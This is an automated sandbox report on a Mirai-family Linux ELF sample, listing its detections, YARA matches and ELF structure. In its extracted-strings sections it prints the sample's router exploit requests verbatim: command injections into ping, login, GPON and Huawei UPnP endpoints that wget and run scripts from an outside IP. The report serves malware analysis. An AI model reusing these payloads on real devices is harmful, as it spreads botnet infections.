
Linux Analysis Report
w9J4jyf7oY

Overview

General Information

Sample Name: w9J4jyf7oY
Analysis ID: 679627
MD5: bb2f72c63c8c0427d31a757dfa190260
SHA1: 035b12d2be4f11e9ebe390aadab1205a599c6432
SHA256: 2e717964f7f88a60459e708ac92be181d0c3899fd3ce6b60c34624b0402f78a0
Tags: 32, elf, mirai, motorola

Detection

Mirai
Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 679627
Start date and time: 2022-08-06 07:13:57 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 17s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: w9J4jyf7oY
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal64.troj.lin@0/0@0/0
  • VT rate limit hit for: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Command: /tmp/w9J4jyf7oY
PID: 6219
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
Connected To CNC
Standard Error:
  • system is lnxubuntu20
  • cleanup
Source | Rule | Description | Author | Strings
Source: w9J4jyf7oY | Rule: SUSP_XORed_Mozilla | Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key. | Author: Florian Roth
  • 0x1c112:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c182:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c1f2:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c261:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c2d0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c538:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c58b:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c5de:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c631:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c685:$xo1: oMXKNNC\x0D\x17\x0C\x12
Source: w9J4jyf7oY | Rule: JoeSecurity_Mirai_8 | Description: Yara detected Mirai | Author: Joe Security
Source | Rule | Description | Author | Strings
Source: 6222.1.00007fac24021000.00007fac24022000.rw-.sdmp | Rule: SUSP_XORed_Mozilla | Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key. | Author: Florian Roth
  • 0x584:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x5f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x66c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x6e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x754:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x9d4:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa2c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa84:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xadc:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xb34:$xo1: oMXKNNC\x0D\x17\x0C\x12
Source: 6219.1.00007fac2401f000.00007fac24021000.rw-.sdmp | Rule: SUSP_XORed_Mozilla | Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key. | Author: Florian Roth
  • 0x112:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x182:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1f2:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x261:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x2d0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x538:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x58b:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x5de:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x631:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x685:$xo1: oMXKNNC\x0D\x17\x0C\x12
Source: 6222.1.00007fac2401f000.00007fac24021000.rw-.sdmp | Rule: SUSP_XORed_Mozilla | Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key. | Author: Florian Roth
  • 0x112:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x182:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1f2:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x261:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x2d0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x538:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x58b:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x5de:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x631:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x685:$xo1: oMXKNNC\x0D\x17\x0C\x12
Source: 6219.1.00007fac24021000.00007fac24022000.rw-.sdmp | Rule: SUSP_XORed_Mozilla | Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key. | Author: Florian Roth
  • 0x584:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x5f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x66c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x6e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x754:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x9d4:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa2c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa84:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xadc:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xb34:$xo1: oMXKNNC\x0D\x17\x0C\x12
Source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp | Rule: SUSP_XORed_Mozilla | Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key. | Author: Florian Roth
  • 0x1c112:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c182:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c1f2:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c261:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c2d0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c538:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c58b:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c5de:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c631:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x1c685:$xo1: oMXKNNC\x0D\x17\x0C\x12
    No Snort rule has matched


AV Detection

Source: w9J4jyf7oY | Avira: detected
Source: w9J4jyf7oY | Virustotal: Detection: 58%
Source: w9J4jyf7oY | ReversingLabs: Detection: 62%
Source: /tmp/w9J4jyf7oY (PID: 6219) | Socket: 127.0.0.1::44455
Source: w9J4jyf7oY | String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: w9J4jyf7oY | String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: w9J4jyf7oY | String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: w9J4jyf7oY | String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: w9J4jyf7oY | String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: w9J4jyf7oY | String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: w9J4jyf7oY | String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: w9J4jyf7oY | String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: w9J4jyf7oY | String found in binary or memory: http://purenetworks.com/HNAP1/
Source: w9J4jyf7oY | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: w9J4jyf7oY | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: w9J4jyf7oY, type: SAMPLE | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6222.1.00007fac24021000.00007fac24022000.rw-.sdmp, type: MEMORY | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6219.1.00007fac2401f000.00007fac24021000.rw-.sdmp, type: MEMORY | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6222.1.00007fac2401f000.00007fac24021000.rw-.sdmp, type: MEMORY | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6219.1.00007fac24021000.00007fac24022000.rw-.sdmp, type: MEMORY | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: Initial sample | Potential command found: GET oV
Source: Initial sample | Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample | Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample | Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample | Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample | Potential command found: GET /index.php?s=/index/hink
Source: ELF static info symbol of initial sample | .symtab present: no
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine | Classification label: mal64.troj.lin@0/0@0/0
Source: /tmp/w9J4jyf7oY (PID: 6221) | File opened: /proc/<pid>/exe, once for each of the following PIDs: 6230, 6231, 1582, 2033, 2275, 3088, 6191, 6190, 1612, 1579, 1699, 1335, 1698, 2028, 1334, 1576, 2302, 3236, 2025, 2146, 910, 6227, 912, 6229, 517, 759, 6228, 2307, 918, 6241, 6243, 4462, 6245, 6246, 1594, 2285, 2281, 1349, 1623, 761, 1622, 884, 1983, 2038, 1344, 1465, 1586, 1463, 2156, 800, 6238, 801, 6237, 1629, 1627, 1900, 6252, 4470, 4471, 6254, 3021, 491, 2294, 2050, 1877, 772, 1633, 1599, 1632, 774, 1477, 654, 896, 1476, 1872, 2048, 655, 1475, 2289, 656, 777, 657, 6249, 658, 6248, 4468, 4469, 4502, 419, 936, 1639, 1638, 2208, 2180, 1809, 1494, 1890, 2063, 2062, 1888, 1886, 420, 1489, 785, 1642
Source: /tmp/w9J4jyf7oY (PID: 6219) | Queries kernel information via 'uname'
Source: w9J4jyf7oY, 6219.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp, w9J4jyf7oY, 6222.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-m68k
Source: w9J4jyf7oY, 6219.1.0000560d943cf000.0000560d94454000.rw-.sdmp, w9J4jyf7oY, 6222.1.0000560d943cf000.0000560d94454000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/m68k
Source: w9J4jyf7oY, 6219.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp, w9J4jyf7oY, 6222.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/w9J4jyf7oYSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/w9J4jyf7oY
Source: w9J4jyf7oY, 6219.1.0000560d943cf000.0000560d94454000.rw-.sdmp, w9J4jyf7oY, 6222.1.0000560d943cf000.0000560d94454000.rw-.sdmp | Binary or memory string: V!/etc/qemu-binfmt/m68k

Stealing of Sensitive Information

Source: Yara match | File source: w9J4jyf7oY, type: SAMPLE
Source: Yara match | File source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: w9J4jyf7oY, type: SAMPLE
Source: Yara match | File source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
ATT&CK matrix columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Technique shown per column (leading digits are Joe Sandbox's signature-count badges, kept as extracted): Valid Accounts | 1 Command and Scripting Interpreter | Path Interception | Path Interception | Direct Volume Access | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    No configs have been found
Behavior Graph ID: 679627 | Sample: w9J4jyf7oY | Start date: 06/08/2022 | Architecture: LINUX | Score: 64. Signatures attached to the root node: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Mirai. Process tree: the root node starts w9J4jyf7oY, which starts three further w9J4jyf7oY processes; one of those starts three more w9J4jyf7oY processes plus 11 other processes.
Source | Detection | Scanner | Label
w9J4jyf7oY | 58% | Virustotal | -
w9J4jyf7oY | 62% | ReversingLabs | Linux.Trojan.Mirai
w9J4jyf7oY | 100% | Avira | LINUX/Mirai.bonb
No Antivirus matches
Source | Detection | Scanner | Label
http://46.23.109.47/Cloud/Gpon.sh | 19% | Virustotal | -
http://46.23.109.47/Cloud/Gpon.sh | 100% | Avira URL Cloud | malware
http://46.23.109.47/Cloud/Cloud.x86 | 18% | Virustotal | -
http://46.23.109.47/Cloud/Cloud.x86 | 100% | Avira URL Cloud | malware
http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114 | 100% | Avira URL Cloud | malware
http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI | 100% | Avira URL Cloud | malware
http://46.23.109.47/Cloud/Cloud.mpsl;chmod | 100% | Avira URL Cloud | malware
http://46.23.109.47/Cloud/Cloud.mips; | 100% | Avira URL Cloud | malware
http://purenetworks.com/HNAP1/ | 0% | URL Reputation | safe
http://0.0.0.0/Cloud/Cloud.x86 | 0% | Avira URL Cloud | safe
http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | 100% | Avira URL Cloud | malware
    No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://46.23.109.47/Cloud/Gpon.sh | w9J4jyf7oY | true | 19% Virustotal; Avira URL Cloud: malware | unknown
http://46.23.109.47/Cloud/Cloud.x86 | w9J4jyf7oY | true | 18% Virustotal; Avira URL Cloud: malware | unknown
http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114 | w9J4jyf7oY | true | Avira URL Cloud: malware | unknown
http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI | w9J4jyf7oY | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/soap/encoding/ | w9J4jyf7oY | false | - | high
http://46.23.109.47/Cloud/Cloud.mpsl;chmod | w9J4jyf7oY | true | Avira URL Cloud: malware | unknown
http://46.23.109.47/Cloud/Cloud.mips; | w9J4jyf7oY | true | Avira URL Cloud: malware | unknown
http://purenetworks.com/HNAP1/ | w9J4jyf7oY | false | URL Reputation: safe | unknown
http://0.0.0.0/Cloud/Cloud.x86 | w9J4jyf7oY | false | Avira URL Cloud: safe | unknown
http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | w9J4jyf7oY | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/soap/envelope/ | w9J4jyf7oY | false | - | high
        No contacted IP infos
No context
        No created / dropped files found
File type: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Entropy (8bit): 6.536123197703782
TrID:
• ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: w9J4jyf7oY
File size: 119516
MD5: bb2f72c63c8c0427d31a757dfa190260
SHA1: 035b12d2be4f11e9ebe390aadab1205a599c6432
SHA256: 2e717964f7f88a60459e708ac92be181d0c3899fd3ce6b60c34624b0402f78a0
SHA512: af8b0ae4bdb1016c6b65adb1b697b334e3bb38f7a855501fed7cc5727d56f7df93eec6544255ffbee0530c766e1a495375a59bdc3c4e9e3b96043e3697861920
SSDEEP: 3072:Wf75AB1k77IgffdHma8pdPUoPSHLP+E8f:e75AB1k77IgffVma8pdPUzT+EI
TLSH: DFC38ED5A8115F3CFADB9AB582334B0CA82192040FE30F57FA67EC977D73195AA06C46
        File Content Preview:.ELF.......................D...4...L.....4. ...(.......................l...l...... ........p...p...p.......t...... .dt.Q............................NV..a....da.....N^NuNV..J9....f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy...lN.X.........N^NuNV..N^NuN

        ELF header

Class: ELF32
Data: 2's complement, big endian
Version: 1 (current)
Machine: MC68000
Version Number: 0x1
Type: EXEC (Executable file)
OS/ABI: UNIX - System V
ABI Version: 0
Entry Point Address: 0x80000144
Flags: 0x0
ELF Header Size: 52
Program Header Offset: 52
Program Header Size: 32
Number of Program Headers: 3
Section Header Offset: 119116
Section Header Size: 40
Number of Section Headers: 10
Header String Table Index: 9
Section headers:

Name       Type      Address     Offset   Size     EntSize  Flags  Flags Description  Link  Info  Align
(null)     NULL      0x0         0x0      0x0      0x0      0x0    -                  0     0     0
.init      PROGBITS  0x80000094  0x94     0x14     0x0      0x6    AX                 0     0     2
.text      PROGBITS  0x800000a8  0xa8     0x1a3ee  0x0      0x6    AX                 0     0     4
.fini      PROGBITS  0x8001a496  0x1a496  0xe      0x0      0x6    AX                 0     0     2
.rodata    PROGBITS  0x8001a4a4  0x1a4a4  0x29c8   0x0      0x2    A                  0     0     2
.ctors     PROGBITS  0x8001ee70  0x1ce70  0x8      0x0      0x3    WA                 0     0     4
.dtors     PROGBITS  0x8001ee78  0x1ce78  0x8      0x0      0x3    WA                 0     0     4
.data      PROGBITS  0x8001ee84  0x1ce84  0x288    0x0      0x3    WA                 0     0     4
.bss       NOBITS    0x8001f10c  0x1d10c  0x8d8    0x0      0x3    WA                 0     0     4
.shstrtab  STRTAB    0x0         0x1d10c  0x3e     0x0      0x0    -                  0     0     1

Program headers:

Type       Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align   Prog Interpreter  Section Mappings
LOAD       0x0      0x80000000       0x80000000        0x1ce6c    0x1ce6c      6.5552   0x5    R E                0x2000  -                 .init .text .fini .rodata
LOAD       0x1ce70  0x8001ee70       0x8001ee70        0x29c      0xb74        3.0075   0x6    RW                 0x2000  -                 .ctors .dtors .data .bss
GNU_STACK  0x0      0x0              0x0               0x0        0x0          0.0000   0x6    RW                 0x4     -                 -
        No network behavior found

        System Behavior